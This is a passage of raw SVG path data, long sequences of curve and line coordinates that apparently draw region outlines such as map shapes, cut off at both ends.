266.38865,247.07839 267.95692,245.82343 267.98469,242.87244 C 268.00904,240.28451 270.34097,239.01175 275.91701,238.543 C 282.46338,237.99269 283.07293,239.21784 279.75738,246.26176 C 278.40128,249.14279 277.00132,253.07769 276.64634,255.00599 L 276.00093,258.51198 L 282.95327,258.20201 C 292.46308,257.77803 296.61148,260.54531 293.89359,265.5 C 292.95067,267.21893 292.98996,276.11273 293.94839,277.90357 C 294.45091,278.84253 296.42573,280.45286 298.33688,281.48209 C 301.60105,283.23996 301.96555,283.25259 304.34966,281.69046 C 307.42522,279.67528 312.61785,280.41522 314.29973,283.10834 C 315.39069,284.85524 315.53982,284.84149 317.72021,282.79312 C 318.97409,281.61516 320,279.90067 320,278.98316 C 320,278.03823 321.62588,276.54399 323.75,275.53678 C 325.8125,274.55879 329.2361,272.87152 331.35799,271.7873 C 334.27882,270.29484 335.49339,270.0976 336.35799,270.97531 C 337.21638,271.84672 337.01791,272.49045 335.55887,273.56732 C 334.49125,274.35529 334.11694,275 334.72708,275 C 336.95435,275 339,273.75191 339,272.39301 C 339,271.62686 339.45,271 340,271 C 340.55,271 341,271.45 341,272 C 341,272.55 341.66088,273 342.46862,273 C 343.27635,273 343.80011,272.4375 343.63251,271.75 C 343.46491,271.0625 343.55404,270.95 343.83056,271.5 C 344.10709,272.05 344.25833,272.6125 344.16667,272.75 C 344.075,272.8875 344.94404,273.94404 346.09787,275.09787 C 347.56142,276.56142 348.99764,277.04029 350.84787,276.68163 C 352.41103,276.37861 354.15917,276.75893 355.10538,277.60787 C 356.93134,279.24612 360,278.48447 360,276.39301 C 360,275.62686 360.675,275 361.5,275 C 362.325,275 363,275.38394 363,275.85321 C 363,276.32247 365.26972,276.48832 368.04381,276.22177 C 371.98697,275.84288 373.02351,276.03858 372.79381,277.11856 C 372.63222,277.87835 372.05,278.83061 371.5,279.23469 C 370.88069,279.68968 370.97587,279.9752 371.75,279.98469 C 372.4375,279.99311 373,280.9 373,282 C 373,283.30232 373.66667,284 374.91111,284 C 375.96221,284 377.87471,285.24765 379.16111,286.77255 C 383.15853,291.51115 386.09621,292.99935 391.47251,293.00938 C 398.54257,293.02258 406.53389,297.60133 407.54839,302.2203 C 407.94435,304.0231 409.1688,306.27911 410.2694,307.23365 C 411.82872,308.58604 412.016,309.2758 411.11775,310.35812 C 410.20811,311.45416 410.4885,312.09006 412.44733,313.37353 C 413.8126,314.26809 415.42202,315 416.02383,315 C 416.62564,315 416.86586,315.40803 416.55764,315.90674 C 416.24942,316.40545 416.86813,316.58574 417.93256,316.30739 C 420.55208,315.62236 426.99753,317.78848 429.71912,320.26848 C 430.93964,321.38065 433.18964,322.42398 434.71912,322.58698 C 443.90367,323.56583 448.09608,324.90019 452.77256,328.33304 C 455.52003,330.34987 458.66557,332 459.76266,332 C 461.62506,332 462.46061,333.31728 464.39566,339.30416 C 465.05464,341.34298 460.78211,350.46076 458.58997,351.6938 C 457.80165,352.13721 455.61368,354.525 453.7278,357 C 450.74001,360.92115 450.23191,362.44181 449.77787,368.8216 C 449.49128,372.84848 448.74902,376.65098 448.1284,377.2716 C 447.50778,377.89222 446.98999,379.5475 446.97776,380.95 C 446.96553,382.3525 446.07554,384.625 445,386 C 443.92446,387.375 443.03447,389.25718 443.02224,390.18261 C 443.01001,391.10805 442.10914,392.14797 441.02031,392.49355 C 439.93149,392.83913 439.14399,393.62551 439.27031,394.24105 C 439.4005,394.87542 437.98387,395.42749 436,395.51551 C 426.49045,395.93742 415.70812,402.63488 416.10347,407.87425 C 416.47822,412.84063 416.00009,415 414.52568,415 C 413.7148,415 412.31217,416.4625 411.40871,418.25 C 409.18594,422.64776 405.93105,426.07542 404.70013,425.31467 C 404.1451,424.97164 403.97567,425.15162 404.32362,425.71461 C 404.67157,426.27761 403.48103,428.25964 401.67798,430.11912 C 399.87493,431.9786 398.0989,434.2875 397.73124,435.25 C 397.36358,436.2125 396.26115,437.04768 395.28138,437.10596 C 392.2859,437.28414 387.60794,436.91252 385.5,436.32893 C 383.93882,435.8967 383.75712,436.04602 384.67186,437.00946 C 385.31638,437.6883 385.60573,438.86388 385.31487,439.62186 C 385.00077,440.44038 385.43857,441 386.39301,441 C 388.41691,441 388.47994,443.35679 386.5,445 C 385.675,445.68469 385,446.81991 385,447.5227 C 385,448.87074 377.68677,450.98765 371.91833,451.30936 C 368.89924,451.47773 368.48694,451.83352 368.38818,454.35558 C 368.24641,457.97592 366.43334,459.19219 361.96429,458.66494 C 358.99349,458.31444 358.42857,458.55628 358.42857,460.17852 C 358.42857,461.66344 358.93228,461.98283 360.61003,461.56174 C 364.45764,460.59605 364.42244,463.83091 360.56533,465.67024 C 358.45229,466.67787 357.37128,467.80397 357.69848,468.65665 C 358.42245,470.54326 356.44684,472.67103 353.219,473.48117 C 351.73457,473.85374 350.20377,474.6703 349.81722,475.29575 C 348.78814,476.96083 350.8829,479 353.62244,479 C 355.24528,479 356,479.57139 356,480.8 C 356,483.09708 354.10572,485 351.81905,485 C 350.77846,485 349.79035,485.98711 349.44213,487.37453 C 349.11435,488.68052 347.75578,490.24588 346.42308,490.85309 C 343.76396,492.06467 343.32248,493.92248 345.23839,495.83839 C 345.91951,496.51951 346.48201,497.79673 346.48839,498.67666 C 346.50671,501.20092 351.27511,504.12353 357.64722,505.51604 C 362.5294,506.58295 362.96103,506.83278 360.25,507.02253 C 358.4625,507.14764 356.6625,507.32655 356.25,507.42011 C 345.70707,509.8114 343.57528,509.89322 338,508.1206 z M 335.60417,279.27083 C 334.58765,278.25432 333.74892,279.78472 334.58295,281.13421 C 335.21298,282.15363 335.44853,282.15442 335.78725,281.13825 C 336.01885,280.44346 335.93646,279.60312 335.60417,279.27083 z M 369.49292,278.01145 C 369.84326,277.44459 369.44186,277.27695 368.55194,277.61844 C 366.81952,278.28323 366.50255,279 367.94098,279 C 368.45852,279 369.1569,278.55515 369.49292,278.01145 z M 303,165.83222 C 303,164.65241 300.24351,164.79698 299.48992,166.01631 C 299.14446,166.57528 298.49005,166.80287 298.03569,166.52206 C 297.58132,166.24124 296.97175,166.63125 296.68107,167.38873 C 296.24927,168.51398 296.77901,168.57371 299.57629,167.71521 C 301.45933,167.13728 303,166.28994 303,165.83222 z M 281.88119,166.64316 C 282.51935,165.87422 282.74063,163.95316 282.39189,162.20945 C 281.89596,159.72978 282.29521,158.61388 284.44886,156.46023 C 287.56425,153.34484 287.29784,152.45154 283.73719,154.07388 C 280.76714,155.42713 278.01935,161.6504 278.73619,165.40029 C 279.29074,168.30125 280.20518,168.66262 281.88119,166.64316 z M 308.52646,164.19313 C 308.21857,163.88524 307.41167,164.19249 306.73333,164.87591 C 305.75307,165.86353 305.86793,165.97839 307.29313,165.43571 C 308.27935,165.06018 308.83435,164.50102 308.52646,164.19313 z M 299.27666,158.16464 C 299.44398,155.78077 299.87626,155.13426 301,155.58723 C 305.72762,157.49289 305.59594,157.49229 304.05601,155.60103 C 303.07285,154.39355 301.76923,153.99615 299.97112,154.35578 C 298.51862,154.64628 296.13092,154.26175 294.66511,153.50128 C 292.20391,152.2244 290.73934,153.10283 293,154.5 C 293.55,154.83992 294,155.94333 294,156.95203 C 294,157.96073 294.675,159.04504 295.5,159.36163 C 296.325,159.67821 297,160.71635 297,161.66862 C 297,164.72922 299.03582,161.59592 299.27666,158.16464 z M 317.37804,161.19733 C 317.96375,160.24964 309.27283,160.39384 308.31903,161.34764 C 307.96023,161.70644 309.74011,162 312.27432,162 C 314.80852,162 317.1052,161.6388 317.37804,161.19733 z M 274.47251,148.34455 C 277.17733,146.50082 278.80483,146.6592 278.63889,148.75 C 278.52504,150.18451 279.22112,150.45595 282.5,150.25568 C 289.02963,149.85686 289.60719,149.22265 285.79601,146.63632 C 281.37849,143.6385 277.28853,142.80573 276.54167,144.752 C 276.22535,145.57633 275.3138,145.95066 274.43963,145.61521 C 273.55635,145.27626 273.15746,145.44576 273.50708,146.01145 C 273.8431,146.55515 273.22828,147 272.1408,147 C 269.00648,147 267.0833,148.05351 267.62773,149.47225 C 268.19545,150.95172 271.4293,150.41893 274.47251,148.34455 z M 345.37428,143.05556 C 345.13787,142.81111 343.94444,143.66343 342.72222,144.9496 L 340.5,147.2881 L 343.15206,145.39405 C 344.61069,144.35232 345.61069,143.3 345.37428,143.05556 z M 155,144.03518 C 155,143.50453 153.9875,142.53906 152.75,141.88967 C 150.51206,140.71531 150.51021,140.72048 152.40499,142.85449 C 154.52132,145.23803 155,145.45582 155,144.03518 z M 70,102 C 71.292687,101.1646 71.266292,101.02851 69.809017,101.01531 C 68.878976,101.00689 67.839919,101.45 67.5,102 C 66.717818,103.2656 68.041628,103.2656 70,102 z M 287,82 C 287,81.45 286.55,81 286,81 C 285.45,81 285,81.45 285,82 C 285,82.55 285.45,83 286,83 C 286.55,83 287,82.55 287,82 z M 205.13112,75.657991 C 204.51855,74.919886 204.21544,74.117895 204.45754,73.87579 C 204.69965,73.633685 201.20824,73.753237 196.69887,74.141462 C 190.1071,74.708966 188.34325,74.568267 187.70031,73.423663 C 187.26048,72.640648 185.68548,72.035526 184.20031,72.078947 L 181.5,72.157895 L 184.25,73.162281 C 185.7625,73.714693 187,74.639632 187,75.217701 C 187,75.896386 189.39315,76.097506 193.75518,75.785404 C 197.47053,75.519572 201.40803,75.652478 202.50518,76.080751 C 205.5455,77.267539 206.35832,77.136679 205.13112,75.657991 z M 252.95,74.999294 C 253.88538,74.998868 254.55536,74.036787 254.63962,72.573034 C 254.73678,70.88518 254.35836,70.308991 253.39537,70.678525 C 252.63423,70.9706 252.26046,71.612416 252.56476,72.104785 C 252.86906,72.597153 252.65731,73 252.0942,73 C 251.53109,73 250.54945,74.0125 249.91278,75.25 C 248.95746,77.106848 248.98626,77.281582 250.07759,76.25 C 250.80492,75.5625 252.0975,74.999682 252.95,74.999294 z M 285.34148,59.743511 C 284.98561,59.167706 285.52421,58.089859 286.53835,57.348296 C 288.61688,55.828441 287.31626,55.515199 285,56.977798 C 283.07697,58.192092 282.75335,62.03188 284.63489,61.309866 C 285.37938,61.024176 285.69735,60.319317 285.34148,59.743511 z M 307,59.606989 C 307,59.390833 306.30163,58.945987 305.44806,58.618443 C 304.55814,58.276947 304.15674,58.444594 304.50708,59.011454 C 305.09434,59.961658 307,60.416902 307,59.606989 z M 455.75,505.69727 C 451.75805,504.57952 450.70569,503 453.95295,503 C 456.4244,503 461,505.0521 461,506.16052 C 461,507.12722 460.79118,507.10879 455.75,505.69727 z M 376.51652,498.02673 C 376.19721,497.51007 375.29691,497.33257 374.51586,497.63229 C 372.14722,498.54122 370.8015,497.05564 372.47634,495.3808 C 374.11727,493.73988 383.5,493.77897 383.5,495.42673 C 383.5,496.8046 377.2088,499.14686 376.51652,498.02673 z M 322.24473,496.47861 C 322.41081,495.39038 322.98618,494.5 323.52334,494.5 C 324.63708,494.5 324.31687,496.02998 322.89996,497.47861 C 322.28452,498.10783 322.05058,497.7508 322.24473,496.47861 z M 1168,492.55902 C 1168,492.31648 1168.45,491.83992 1169,491.5 C 1169.55,491.16008 1170,491.35852 1170,491.94098 C 1170,492.52344 1169.55,493 1169,493 C 1168.45,493 1168,492.80156 1168,492.55902 z M 827,487 C 827,485.66667 827.66667,485 829,485 C 830.1,485 831,485.43588 831,485.96862 C 831,486.50135 831.675,486.67821 832.5,486.36163 C 833.44984,485.99714 834,486.37542 834,487.39301 C 834,488.5629 833.04801,489 830.5,489 C 827.66667,489 827,488.61905 827,487 z M 1174,479 C 1174.9395,477.24446 1174.7605,477 1172.5352,477 C 1171.1408,477 1170,476.50554 1170,475.90121 C 1170,474.13803 1175.6644,469.34088 1180.5242,466.98826 C 1183.2024,465.69178 1186.2802,463.04433 1188.1725,460.40936 C 1191.3633,455.96623 1194,454.67657 1194,457.55902 C 1194,458.55079 1194.4544,458.83722 1195.2488,458.34623 C 1195.9356,457.92174 1197.3587,457.55768 1198.4111,457.53721 C 1200.5481,457.49565 1201.9338,455.00881 1199.8333,454.98469 C 1199.1,454.97627 1197.8777,454.57524 1197.1171,454.09352 C 1195.958,453.35943 1195.9985,452.84029 1197.3671,450.88632 C 1199.6842,447.57822 1199.4524,446.38418 1195.429,440.90332 C 1191.9898,436.21813 1191.4102,432.2673 1194.6352,435.49233 C 1195.4644,436.32155 1196.75,437 1197.492,437 C 1198.234,437 1199.132,438.32432 1199.4875,439.94293 C 1199.9414,442.00953 1200.5783,442.7153 1201.6266,442.31305 C 1202.579,441.94757 1203.3122,442.47767 1203.6521,443.77767 C 1204.2548,446.08249 1207.3335,447.20538 1210.7199,446.35546 C 1212.4133,445.93044 1213,446.21396 1213,447.45733 C 1213,450.28353 1211.075,452.966 1209.4847,452.35577 C 1208.474,451.96792 1208,452.43031 1208,453.80412 C 1208,454.91407 1206.6174,456.9856 1204.9275,458.40751 C 1202.5288,460.42593 1201.4472,460.77449 1199.9947,459.99716 C 1198.5288,459.21264 1198.0086,459.39748 1197.5416,460.86887 C 1197.2156,461.89592 1196.0908,463.51286 1195.0419,464.46207 C 1193.993,465.41128 1193.3649,466.78733 1193.646,467.51995 C 1193.9833,468.39893 1193.1951,468.96219 1191.3286,469.17599 C 1189.2965,469.40877 1188.0776,470.39267 1187,472.6702 C 1185.6268,475.57239 1179.4331,479.76647 1178.2571,478.59048 C 1177.9848,478.3181 1177.1083,478.74881 1176.3095,479.54762 C 1174.1604,481.69679 1172.7373,481.35936 1174,479 z M 1228.6395,469.30615 C 1227.5133,468.17996 1227.9536,467 1229.5,467 C 1230.325,467 1231,467.42344 1231,467.94098 C 1231,469.20196 1229.4384,470.10508 1228.6395,469.30615 z M 1097.2463,466.41859 C 1096.6389,465.76837 1095.9975,464.39569 1095.821,463.36819 C 1095.6444,462.34068 1094.8644,461.00257 1094.0875,460.39461 C 1093.3107,459.78664 1092.9528,458.56545 1093.2922,457.68084 C 1093.8042,456.34662 1094.4315,456.25447 1096.9724,457.14021 C 1100.8001,458.47458 1105.3997,457.48406 1104.6346,455.49015 C 1103.8174,453.36051 1105.7613,452.66197 1106.7722,454.72199 C 1108.1005,457.42861 1106.1723,467.2801 1104.4441,466.61692 C 1103.6851,466.32566 1102.8158,466.48906 1102.5123,466.98004 C 1101.7583,468.20009 1098.5955,467.86288 1097.2463,466.41859 z M 1091,454.55902 C 1091,453.70156 1091.45,453 1092,453 C 1093.2939,453 1093.2939,454.70032 1092,455.5 C 1091.45,455.83992 1091,455.41648 1091,454.55902 z M 1096.6499,450.36831 C 1094.1691,449.50944 1092.1956,449.36013 1091.0968,449.94819 C 1090.1593,450.44993 1088.7837,450.48438 1088.04,450.02475 C 1087.2963,449.56511 1085.6331,449.38031 1084.3439,449.61408 C 1083.0548,449.84785 1082,449.58031 1082,449.01956 C 1082,448.4588 1081.1158,448 1080.0352,448 C 1078.9545,448 1077.5887,447.1 1077,446 C 1076.4113,444.9 1076.1863,444 1076.5,444 C 1076.8137,444 1076.6003,443.1217 1076.0258,442.04823 C 1075.1303,440.37494 1074.2692,440.18079 1069.9906,440.68752 C 1067.2363,441.01372 1065,440.87208 1065,440.37143 C 1065,439.87249 1066.1237,437.81057 1067.4971,435.78939 C 1068.9738,433.61624 1069.5868,431.86267 1068.9971,431.49824 C 1068.4487,431.15929 1068,431.3282 1068,431.8736 C 1068,432.41899 1067.1,433.15087 1066,433.5 C 1064.9,433.84913 1064,435.00826 1064,436.07586 C 1064,437.76662 1063.7421,437.85587 1062,436.76793 C 1060.9,436.08097 1059.9858,435.06465 1059.9684,434.50945 C 1059.9046,432.47086 1055.3886,428.44627 1051.4219,426.89291 C 1047.2246,425.24926 1044.4879,425.28622 1035,427.11474 C 1031.975,427.69772 1028.5066,428.36418 1027.2925,428.59575 C 1026.0783,428.82732 1023.8938,430.12066 1022.438,431.46984 C 1020.1494,433.5909 1018.8985,433.90769 1013.1959,433.81051 C 1009.02,433.73935 1006.4599,434.12033 1006.217,434.84906 C 1006.006,435.48208 1004.9708,436 1003.9167,436 C 1002.8625,436 1002,436.45 1002,437 C 1002,438.60091 996.3942,438.15527 992.5657,436.25 C 989.2412,434.59554 987.28972,430.40647 990.3994,431.59977 C 993.04582,432.6153 991.25638,422.55124 987.38902,414.66896 C 986.62506,413.11189 986,411.26913 986,410.57395 C 986,409.87876 985.1,408.49549 984,407.5 C 982.9,406.50451 982.00689,404.97227 982.01531,404.09501 C 982.02871,402.7 982.15218,402.68809 983,404 C 983.53316,404.825 984.01206,405.05 984.06423,404.5 C 984.1164,403.95 984.3133,401.16007 984.50179,398.30015 C 984.82354,393.41807 986.87479,387.38756 986.9849,391 C 987.01333,391.93266 987.30851,392.10181 987.76531,391.44721 C 988.9516,389.7473 995.796,385.87307 997.2055,386.10366 C 997.91747,386.22014 999.175,386.04168 1000,385.70709 C 1000.825,385.3725 1003.4626,384.5957 1005.8612,383.98088 C 1010.1784,382.87429 1015.219,378.70898 1014.7989,376.59507 C 1014.4064,374.61973 1017.4381,371.00014 1019.4905,370.99368 C 1020.6395,370.99006 1022.1793,369.79288 1023.0863,368.19786 C 1023.9588,366.66364 1026.1998,364.66874 1028.0663,363.76476 C 1031.2754,362.21055 1031.6306,362.22664 1034.598,364.06058 C 1037.9672,366.14285 1041.538,366.67954 1040.4643,364.94228 C 1040.1048,364.36054 1040.9846,362.11054 1042.4195,359.94228 C 1044.53,356.75312 1044.7232,356 1043.4309,356 C 1042.5522,356 1042.0183,355.4375 1042.2444,354.75 C 1042.7437,353.23173 1050.6806,352.50211 1052.3239,353.82342 C 1053.9449,355.12675 1059.836,356.38397 1063.75,356.26184 C 1067.1905,356.15448 1067.6426,356.93085 1065.9648,360.06574 C 1065.2512,361.39907 1065.2512,362 1065.9648,362 C 1066.5342,362 1067,362.675 1067,363.5 C 1067,364.43333 1066.0556,365 1064.5,365 C 1061.3986,365 1061.3089,366.06959 1064.25,367.98178 C 1069.2397,371.22592 1073.6712,372.76353 1075.3398,371.8297 C 1077.1507,370.8163 1077.7618,372.41116 1075.9837,373.51008 C 1074.5724,374.38231 1075.7621,376 1077.8149,376 C 1080.0204,376 1082.0208,371.38088 1082.4408,365.31849 C 1082.9525,357.93059 1084.0684,353.18813 1085.5928,351.923 C 1086.6757,351.02427 1087.1052,351.17951 1087.5695,352.63738 C 1087.8958,353.66182 1088.6572,355.625 1089.2615,357 C 1089.8659,358.375 1090.3917,360.6236 1090.4302,361.99688 C 1090.4719,363.48977 1091.1031,364.518 1092,364.55403 C 1095.4398,364.69225 1097,366.24293 1097,369.52366 C 1097,371.34398 1097.4461,372.98333 1097.9913,373.16667 C 1098.5365,373.35 1099.1546,374.98058 1099.3648,376.79017 C 1099.7553,380.1521 1100.459,381.4035 1102.0833,381.625 C 1102.5875,381.69375 1103.4154,381.80625 1103.9231,381.875 C 1105.7578,382.12345 1111,388.19902 1111,390.07692 C 1111,391.13462 1111.3375,391.94671 1111.75,391.88158 C 1114.2005,391.49466 1116,392.20288 1116,393.55423 C 1116,394.40906 1117.3479,396.54656 1118.9954,398.30423 C 1120.6428,400.06191 1121.9928,401.92351 1121.9954,402.44113 C 1121.9979,402.95875 1122.6744,402.50875 1123.4988,401.44113 C 1124.8816,399.65015 1124.9498,399.82419 1124.3804,403.69104 C 1124.041,405.99611 1124.2661,409.32457 1124.8807,411.08761 C 1125.6127,413.18756 1125.6882,415.53596 1125.0994,417.89657 C 1124.605,419.87846 1123.9267,422.71839 1123.5919,424.20754 C 1123.2571,425.69668 1121.869,428.17168 1120.5071,429.70754 C 1116.2374,434.52284 1116,434.8784 1116,436.45779 C 1116,437.30601 1115.6139,438 1115.1421,438 C 1114.6702,438 1113.8827,439.88396 1113.3921,442.18657 C 1112.5443,446.16539 1112.2528,446.4361 1107.5193,447.64181 C 1104.7799,448.33958 1102.0796,449.53828 1101.5185,450.30559 C 1100.6568,451.48406 1099.9008,451.4938 1096.6499,450.36831 z M 1071.5411,437.93347 C 1072.4127,436.52322 1071.0944,435.24513 1070.1956,436.62902 C 1069.813,437.21812 1068.825,437.95706 1068,438.27111 C 1066.9792,438.65971 1067.1999,438.86732 1068.691,438.92105 C 1069.896,438.96447 1071.1786,438.52006 1071.5411,437.93347 z M 1051,356 C 1051,355.45 1050.325,355 1049.5,355 C 1048.675,355 1048,355.45 1048,356 C 1048,356.55 1048.675,357 1049.5,357 C 1050.325,357 1051,356.55 1051,356 z M 652.96917,435.77766 C 649.87431,434.54307 647.39109,429.99436 649.20124,428.87563 C 650.63615,427.98881 645.96216,418.10148 642.01692,413.67795 C 639.43938,410.78793 636.98636,403.25707 636.57534,396.9721 C 636.35982,393.67659 633.22257,387.08627 628.87224,380.79049 C 627.84251,379.30026 627,376.56944 627,374.72199 C 627,369.70441 629.86208,360.72766 632.06379,358.83971 C 634.36757,356.86422 634.54888,353.28659 632.54131,349.41699 C 631.57029,347.54534 631.40924,346.21183 632.05958,345.42821 C 632.71753,344.63543 632.32254,342.65902 630.84995,339.37552 C 629.64733,336.69399 628.58774,334.275 628.49532,334 C 627.57634,331.26577 626.07623,329.16201 622.53623,325.64297 C 617.9887,321.12237 615.39484,316.36839 617.15561,315.78146 C 617.73447,315.58851 618.35237,314.09625 618.52873,312.46532 C 618.70509,310.83439 619.29514,308.06095 619.83994,306.30211 C 620.58082,303.91026 620.50321,302.83259 619.53203,302.02658 C 618.57069,301.22874 618.07526,301.36148 617.62385,302.53786 C 617.2885,303.41176 616.52174,303.82245 615.91993,303.45051 C 615.132,302.96355 615.13002,302.46998 615.91287,301.68713 C 618.11674,299.48326 616.93052,298.75156 612.17625,299.38223 C 607.4556,300.00845 607.28318,299.93585 604.10866,295.98559 C 600.88719,291.9769 600.82905,291.95369 595.6824,292.62192 C 592.83208,292.992 590.275,293.58483 590,293.93933 C 589.38485,294.73231 582.23089,296.97282 579.5,297.22778 C 578.4,297.33047 575.91078,297.06459 573.96839,296.63693 C 571.51428,296.0966 569.07347,296.35826 565.96839,297.49454 C 563.51078,298.39389 560.91917,299.21303 560.20926,299.31486 C 559.49935,299.41669 554.66789,296.8 549.47269,293.5 C 541.62181,288.51312 539.8446,286.90902 538.94747,284 C 538.25666,281.75999 535.94114,278.88002 532.51543,276 C 527.84118,272.07034 527.15246,271.02074 527.08139,267.71862 C 527.03217,265.43211 526.43758,263.72141 525.57732,263.3913 C 524.40789,262.94254 524.47311,262.52689 525.94374,261.05626 C 528.86768,258.13232 529.80617,243.10206 527.12071,242.2069 C 523.92251,241.14084 527.16398,234.23752 537.66542,219.75 C 539.16045,217.6875 540.94977,216 541.6417,216 C 542.33362,216 544.97234,214.60122 547.50551,212.8916 C 551.48781,210.20398 552.03471,209.42561 551.54558,207.1416 C 550.78444,203.58743 554.05612,198.41775 558.36775,196.36168 C 562.47382,194.40363 565.14725,189.46058 563.7645,186.38335 C 562.9407,184.55005 562.20153,184.33567 558.2427,184.78189 C 554.42037,185.21272 553.76839,185.04596 554.26057,183.76334 C 554.58428,182.91979 554.16901,181.25861 553.33777,180.07184 C 552.32626,178.62772 552.14766,177.51488 552.79773,176.70704 C 554.44599,174.65879 555.07236,169.65688 554.09993,166.30831 C 553.28624,163.50637 553.46723,162.92388 555.58211,161.53815 C 556.9071,160.66999 559.00566,160.1957 560.24558,160.48417 C 561.48551,160.77263 566.44069,161.18484 571.25709,161.40017 C 580.77745,161.82582 580.43965,162.02368 581.4034,155.45723 C 581.78305,152.87052 577.08178,148.3375 572.89395,147.25233 C 568.28161,146.05715 567.87198,143.3965 572.19995,142.74469 C 574.01498,142.47135 575.63408,142.59419 575.79795,143.01769 C 575.96182,143.44119 576.92204,143.57164 577.93177,143.30759 C 579.14442,142.99048 579.60198,142.19397 579.27962,140.96128 C 578.83227,139.25058 579.0633,139.19527 582.0521,140.29753 C 584.6303,141.24837 585.40197,141.23842 585.73964,140.25 C 585.9745,139.5625 587.25417,139 588.58333,139 C 590.34726,139 591,138.4503 591,136.96482 C 591,135.27221 590.67883,135.10152 589.09196,135.95078 C 588.04254,136.51242 584.21754,137.03626 580.59196,137.11487 C 576.96638,137.19349 574,137.60768 574,138.03529 C 574,138.4629 573.0976,138.57678 571.99467,138.28836 C 570.89174,137.99993 569.35681,138.28891 568.5837,138.93053 C 567.66942,139.68932 566.96101,139.74593 566.55716,139.09249 C 566.21567,138.53995 567.07174,137.34387 568.45955,136.43455 C 569.84735,135.52522 570.7306,134.37311 570.42232,133.8743 C 570.11403,133.37549 569.47399,133.20706 569,133.5 C 568.52601,133.79294 567.87557,133.60768 567.55458,133.08831 C 567.23359,132.56893 567.93695,131.8374 569.11761,131.46267 C 570.52349,131.01646 570.8619,130.53268 570.09826,130.06073 C 568.02077,128.77677 569.89503,126.25728 572.5501,126.76483 C 575.58138,127.34429 575.69898,125.92306 572.82811,123.40499 C 571.63356,122.35724 570.95598,122.01535 571.32236,122.64522 C 571.68875,123.27508 571.29273,124.05743 570.44232,124.38376 C 569.59191,124.71009 569.14191,124.5794 569.44232,124.09333 C 569.74273,123.60726 569.28758,122.94059 568.43087,122.61185 C 567.55975,122.27757 567.18964,121.50217 567.59113,120.85255 C 568.04781,120.11363 567.87128,119.96152 567.10595,120.43452 C 566.18473,121.00386 566.17722,121.50861 567.07389,122.58903 C 568.17165,123.91175 567.6504,124.44722 565.62549,124.07692 C 565.14451,123.98896 564.95797,124.99981 565.21096,126.32325 C 565.83779,129.60228 564.25717,131.3563 559.38398,132.78949 C 551.34826,135.15277 547.08393,133.77472 550.55703,129.93699 C 551.52115,128.87164 551.84648,128 551.27999,128 C 550.71349,128 550.25,126.875 550.25,125.5 C 550.25,123.57323 550.7665,123 552.50256,123 C 553.74146,123 555.31531,122.325 556,121.5 C 556.68469,120.675 558.50229,120 560.03911,120 C 561.57593,120 563.06157,119.4375 563.34054,118.75 C 563.72223,117.80932 564.11025,117.87119 564.90856,119 C 565.82396,120.29439 565.97147,120.26012 565.98469,118.75 C 565.99311,117.7875 565.325,117 564.5,117 C 563.675,117 563,116.55 563,116 C 563,115.45 563.55013,115 564.22251,115 C 564.89488,115 564.44488,114.29948 563.22251,113.4433 C 562.00013,112.58711 561,111.44799 561,110.91191 C 561,109.24976 564.15144,108.63187 565.11922,110.10428 C 565.87981,111.26147 566.21286,111.20092 567.06799,109.75 C 567.66908,108.7301 569.29548,108 570.96636,108 C 572.54319,108 574.00989,107.47033 574.22568,106.82295 C 574.44822,106.15534 575.1617,105.9819 575.87416,106.42223 C 576.85298,107.02717 576.78428,107.58088 575.56296,108.93043 C 573.62032,111.07703 574.53944,112.1537 577.64846,111.37338 C 580.25306,110.71967 580.67441,111.94723 578.84882,114.87048 C 577.85945,116.4547 578.43226,117.43314 582.92377,121.83111 C 585.79815,124.64563 587.9048,127.34502 587.60522,127.82975 C 587.30564,128.31449 588.11916,128.50872 589.41305,128.26137 C 592.48543,127.67405 593.63238,129.64375 591.55479,131.93946 C 590.04266,133.61034 590.04139,133.80191 591.53862,134.37644 C 592.43234,134.7194 593.81999,135 594.62228,135 C 596.59433,135 602,130.9178 602,129.42857 C 602,128.37772 604.50194,127.06257 607.5,126.53748 C 616.93314,124.88533 616.99536,124.85984 616.02431,123.04542 C 615.49964,122.06507 615.35453,120.9788 615.70185,120.63148 C 616.04917,120.28417 615.80833,120 615.16667,120 C 613.60619,120 613.67157,115.50186 615.25,114.26688 C 615.9375,113.72897 617.4,113.04992 618.5,112.75789 C 619.6,112.46585 621.26486,111.9114 622.19968,111.52578 C 623.57121,110.96 623.81671,111.28039 623.47129,113.18527 C 622.86072,116.55239 626.26754,118.62644 629.12332,116.62618 L 631.17383,115.18995 L 629.13251,114.54206 C 628.00978,114.18572 626.52974,112.34151 625.84353,110.44383 C 624.5079,106.75021 623.06738,106.59017 618.28518,109.60413 C 614.89241,111.7424 608.38363,111.38363 605.92268,108.92268 C 604.7417,107.7417 604.10191,106.17681 604.43993,105.29593 C 604.76695,104.44375 604.5422,103.15331 603.94049,102.42829 C 602.29571,100.44646 603.21411,96.574973 605.42928,96.152366 C 606.49038,95.949929 607.98502,95.157832 608.75071,94.39215 C 609.51639,93.626467 610.79182,93 611.585,93 C 613.01661,93 613.72862,92.716343 619.5,89.846778 C 625.49699,86.865035 627.53646,85.439519 630.36863,82.25 C 631.95586,80.4625 633.68876,79 634.21952,79 C 634.75028,79 636.2827,78.136189 637.62489,77.08042 L 640.06524,75.160841 L 636.37496,75.453647 L 632.68467,75.746453 L 635.09234,73.895463 C 637.43481,72.094587 639.66654,71.529465 643.25,71.829767 C 644.2125,71.910426 645,71.582801 645,71.10171 C 645,70.114514 649.54077,69.016427 655.5,68.562514 C 660.16496,68.207184 662.30347,67.734278 663,66.903972 C 664.07173,65.626409 669,64.96883 669,66.103393 C 669,66.886975 669.39194,66.929155 670.25,66.237917 C 672.19018,64.674956 677.34097,63.901447 678.94612,64.931999 C 679.83787,65.504529 681.06511,65.500336 682.1475,64.92106 C 683.27433,64.317998 685.6208,64.391842 688.70138,65.127311 C 696.59652,67.012226 696.75947,67.096486 694.5,68.125645 C 692.98626,68.815134 693.38289,68.93057 696.13135,68.600435 C 698.1685,68.355739 700.96249,68.786711 702.49566,69.582125 C 703.99878,70.361956 706.74538,71 708.5992,71 C 712.94117,71 728.69838,75.555518 730.46418,77.321321 C 734.20879,81.065936 725.28928,83.545718 713.75576,81.966558 C 709.24615,81.349108 705.13674,80.58451 704.62373,80.267452 C 704.11072,79.950394 704.01207,80.210512 704.40451,80.845492 C 704.79695,81.480471 706.04396,82 707.17565,82 C 708.76149,82 709.10964,82.472731 708.69409,84.061803 C 708.04874,86.529609 713.0238,90.036933 717,89.917315 C 719.49116,89.842371 719.4901,89.838496 716.7,88.821053 C 715.16,88.259474 714.08054,87.2825 714.30121,86.65 C 714.72594,85.43257 715.80204,85.42558 723,86.593496 C 726.9737,87.238255 